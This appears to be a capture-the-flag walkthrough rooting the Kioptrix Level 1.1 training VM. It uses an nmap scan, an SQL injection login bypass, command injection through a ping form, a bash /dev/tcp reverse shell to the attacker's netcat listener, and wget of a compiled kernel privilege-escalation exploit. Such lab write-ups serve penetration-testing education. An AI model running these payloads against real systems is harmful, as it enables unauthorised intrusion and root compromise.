Lets continue the Kioptrix series with Kioptrix Level 1.1 #2
The Kioptrix series is aimed and beginners and thus are pretty easy challenges. The objective is getting root access to the vm via any means possible, except by hacking the actual vm client. The purpose of these vulnerable vm’s are to learn the basic techniques and tools used in penetration tests. There are more than one way of achieving the objective in this challenge.
The Kioptrix Level 1.1 VM can be downloaded from here. Note that it is an vmware image and can be used in vmware workstation or player. You can convert the image to be compatible with virtualbox.
## The Hack
The first step with every penetration test is intellegence gathering. This consists of passive / active recon and enumeration. Find out which services are running on the target server that are open to the world and which version they are using so that you can search for known vulnerabilities.
To achieve this we will be using a tool that will become the foundation of your pentesting toolkit. Nmap. nmap man page can be found here - it will explain all the options / flags / arguments usable with nmap.
apb@stratios:~$ nmap -sV -A -p- 192.168.163.132 Nmap scan report for 192.168.163.132 Host is up (0.00024s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 617/udp status |_ 100024 1 620/tcp status 443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-10-08T00:10:47 |_Not valid after: 2010-10-08T00:10:47 |_ssl-date: 2018-01-19T12:08:32+00:00; -2h09m41s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_ SSL2_DES_64_CBC_WITH_MD5 620/tcp open status 1 (RPC #100024) 631/tcp open ipp CUPS 1.1 | http-methods: |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 3306/tcp open mysql MySQL (unauthorized) Host script results: |_clock-skew: mean: -2h09m41s, deviation: 0s, median: -2h09m41s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.50 seconds
Above shows us which ports are open on the target server, what services are running on those ports and their versions.
The ones which might be of use to us are port 22(ssh), port 80(http), port 443(https) and 3306(mysql).
Because http and mysql are running, we can safely assume there might be a website running on this host, possibly a php website which would be connected to the MySQL service and could be vulnerable to sqli (sql injection).
Lets start there and see what comes up.
Browse to http://192.168.163.132 and you should see the following.
…And it’s a login page. Lets attempt some sqli.
Now I am assuming the original sql query in the app looks something like this
SELECT * FROM users WHERE username='$username' AND password='$password'
SELECT * FROM users WHERE username='admin' AND password='somepassword'
SELECT * FROM users WHERE username='1' or 1=1 -- -' AND password=''
This works because sql injections are based on 1 = 1 is always true. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing us to login.
Now we are given an application which can be used to ping network machines. Let’s test and ping the localhost.
So the ping actually works. Now I wonder if we can run other commands besides ping from this interface. Let’s test. Run localhost; ls; id and submit
This application / script is vulnerable to command injection. We are able to ping the machine, do a long listing of the directory the script resides in and see we are running as user apache.
Let’s take it a little further and see if we can get a remote shell. To do this we will run nc (netcat) on our kali machine to listen on a specific port, then execute bash on the target host to make a tcp connection to our kali machine on the specified port.
First set up nc on your kali machine to listen on port 80.
root@stratios:~# nc -nlvp 80 listening on [any] 80 ...
Then run a ping and the following command in the ping script.
127.0.0.1; bash -i >& /dev/tcp/192.168.163.128/80 0>&1
Go back to your kali shell and you’ll see it connected via remote shell
connect to [192.168.163.128] from (UNKNOWN) [192.168.163.132] 32779 bash: no job control in this shell bash-3.00$ id uid=48(apache) gid=48(apache) groups=48(apache) bash-3.00$
And we got a shell on the target machine as the apache user. Let’s gather some information about this host which we can use to look for an privilege escalation exploit.
Get OS and kernel version
bash-3.00$ cat /etc/redhat-release CentOS release 4.5 (Final) bash-3.00$ uname -a Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Now that we have version numbers, lets see if anything comes up in exploitdb.
apb@stratios:~$ searchsploit centos Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | exploits/linux_x86/local/9542.c apb@stratios:~$ searchsploit 2.6.9 Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation | exploits/linux/local/1397.c
Two hists to try. Lets start with the first one.
Copy the exploit to the /tmp directory and compile.
apb@stratios:/tmp$ cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c /tmp/ apb@stratios:/tmp$ gcc -o 9542 9542.c 9542.c: Assembler messages: 9542.c:48: Error: operand type mismatch for `push' 9542.c:51: Error: invalid instruction suffix for `push' 9542.c:54: Error: invalid instruction suffix for `pop'
Getting the above error due to the exploit made on 32bit systems and trying to compile on 64bit.
Try again with an additional flag specifying it is for 32bit.
apb@stratios:/tmp$ gcc -m32 9542.c -o 9542
Now we need to get this exploit onto the target server.
Copy the exploit into the apache document root on your kali machine and start http.
root@stratios:/tmp# cp 9542 /var/www/html/ root@stratios:/tmp# cd /var/www/html/ root@stratios:/var/www/html# ls -l total 24 -rwxr-xr-x 1 root root 7924 Feb 23 10:55 9542 -rw-r--r-- 1 root root 10701 Apr 16 2017 index.html -rw-r--r-- 1 root root 612 Oct 20 16:41 index.nginx-debian.html root@stratios:/var/www/html# /etc/init.d/apache2 start [ ok ] Starting apache2 (via systemctl): apache2.service.
Download the exploit onto the target machine from the reverse shell, make it executable and run it.
bash-3.00$ cd /tmp bash-3.00$ ls bash-3.00$ wget http://192.168.163.128/9542 --21:19:55-- http://192.168.163.128/9542 => `9542' Connecting to 192.168.163.128:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7,924 (7.7K) 0K ....... 100% 503.79 MB/s 21:19:55 (503.79 MB/s) - `9542' saved [7924/7924] bash-3.00$ ls -l total 8 -rw-r--r-- 1 apache apache 7924 Feb 23 2018 9542 bash-3.00$ chmod +x 9542 bash-3.00$ ./9542 bash: [3333: 4] tcsetattr: Invalid argument bash-3.00$ id uid=48(apache) gid=48(apache) groups=48(apache)
So I’m guessing it might have something to do with trying to compile the exploit on kali.. so lets copy the exploit onto the target machine, compile it there and execute.
bash-3.00$ wget http://192.168.163.128/9542.c --21:25:12-- http://192.168.163.128/9542.c => `9542.c' Connecting to 192.168.163.128:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2,643 (2.6K) [text/x-csrc] 0K .. 100% 252.06 MB/s 21:25:12 (252.06 MB/s) - `9542.c' saved [2643/2643] bash-3.00$ gcc 9542.c -o priv 9542.c:109:28: warning: no newline at end of file bash-3.00$ ls 9542 9542.c priv bash-3.00$ chmod +x priv bash-3.00$ ./priv sh: no job control in this shell sh-3.00# id uid=0(root) gid=0(root) groups=48(apache)
Success! root shell obtained.
“The udp_sendmsg function in the UDP implementation in (1) net/ipv4/udp.c and (2) net/ipv6/udp.c in the Linux kernel before 2.6.19 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and a UDP socket.”
Thanks for reading!